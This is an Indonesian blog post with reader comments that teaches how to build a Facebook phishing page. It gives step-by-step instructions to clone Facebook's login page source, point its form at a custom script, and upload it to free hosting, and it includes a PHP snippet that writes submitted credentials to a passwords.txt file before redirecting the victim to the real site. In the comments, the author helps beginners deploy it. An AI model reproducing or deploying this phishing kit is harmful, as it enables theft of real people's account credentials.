Sunday

Cara Bikin Phising Facebook



oke,, kali ini saya akan ngepost tentang phising facebook,,,

mungkin masih banyak yang belom ngerti banget cara bikin dan upload hasil phisingnya,,,

Cara Membuat Web Phising |Topik Cara Membuat Web Phising kalau di bawakan pada jaman sekarang hampir sama dengan Jebakan Batman.. Cara membuat Web Phising Facebook. Yups postingan kali inisaya akan membahas tentang cara membuat web phising. walau pun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang membuatuhkan pengetahuan tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? web phisng = web + phising Web  menurut saya adalah sebuah page yang berisi content yang di isi oleh admin.Phising menurut dari yang saya baca phising  berasal dari kata fishing atau di bahasa indonesia kan yang memiliki arti memancing. Memancing ? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam web phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :


  1. Cari dan buka alamat yang mau di jadiin hompage / halaman utama web phising anda. misal http://facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol Ctrl + U di keyboard secara bersamaan. Kemudian akan muncul Source Code-nya.
  3. Copy semua Source Code yang terdapat di web tersebut. Ctrl + A ( untuk blok all ) kemudian Crtl + C ( untuk meng-copy / menyaslin Source Code tersebut ).
  4. Setelah itu buka notepad/wordpad ( Start – all program – accessories- Notepad/Wordpad)  di windows atau gedit ( Applications –  Accessories – Gedit Text Editor ) di linux ( yang pake gedit ).
  5. Paste Source Code yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan Crtl + F, isi dengan “action=” ( tanpa tanda petik )
  7. Ketemu
    1<form action="URL WEB ASLI" method="post">
  8. Ganti URL WEB ASLI dengan phising.php ( phising.php hanya perumpamaan, bisa anda ganti namun harus semua dengan kata phising.php nantinya di ganti dengan nama.phpanda ).
  9. Ubah “post” menjadi “GET“.
  10. Save as ( file – save as ) atau tekan Ctrl + S. ( ingat file harus di ubah menjadi html )
  11. Buka notepad lagi ( langkah sama seperti nomor 4 ).
  12. copas code php ini ke notepad :
    1<?php header("Location: http://URL WEB ASLI"); $handle = fopen("passwords.txt""a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
  13. Ganti http://URL WEB ASLI dengan http://facebook.com misal.
  14. Save dengan nama phising dan extensi .php jadinya phising.php
  15. Upload ke hostingan anda.
  16. Selesai

nah ane udah bikin ebook tentang bagaimana bikin dan ngejalanin phising itu sendiri ,,,

langsung aja ke TKP:




Cara Bikin Phising Facebook Rating: 4.5 Diposkan Oleh: Miftah Budi

15 komentar:

  1. gan yg tutor no 8 itu gimana ???
    phising.php ??
    itu namanya terserah mau di ganti apa ajah boleh ??

    trus klo tutor yg no 15 ane pakenya
    idhostinger.com

    bisa ga ??
    maaf ane pemula :)

    ReplyDelete
  2. @info : nama terserah kok gan..

    id hostinger bisa dipake juga..

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. This comment has been removed by the author.

    ReplyDelete
  5. file yg di upload yg berbentuk html atau .php gan ???

    ReplyDelete
  6. sama tutor no 16 gimana maksudnya ??

    ReplyDelete
  7. gan kan udah selesai semua...
    cara menjalankannya gimana ???

    semua saya samain, cuma saya nyimpannya dan uploadnya di hostinger ....

    trus cara mencoba klo phisingan buatan saya gimana ???

    ReplyDelete
  8. @info : semua file di upload gan..

    @arys : tinggal di redirect aja gan..

    ReplyDelete
  9. gan ini saya semua yg comment ......

    cara redirect gimana gan ??

    Fb ente apah gan ???

    ReplyDelete
  10. @info : cari aja redrect..biasanya gambar panah..

    ReplyDelete
  11. itu adanya di hostinger atau dimana gan ??
    maklum newbie nih

    ReplyDelete
  12. gan di redirect kemana ??
    kan idhostinger ane
    friendschat.16mb.com ...
    itu kemana redirect.a ???

    ReplyDelete
  13. Gan cara no 12 gimana sih maksudnya ga ngerti

    ReplyDelete
  14. @::☞Daniel_Valentino : buka notepad untuk file baru...disitu kita bikin file phising.php

    ReplyDelete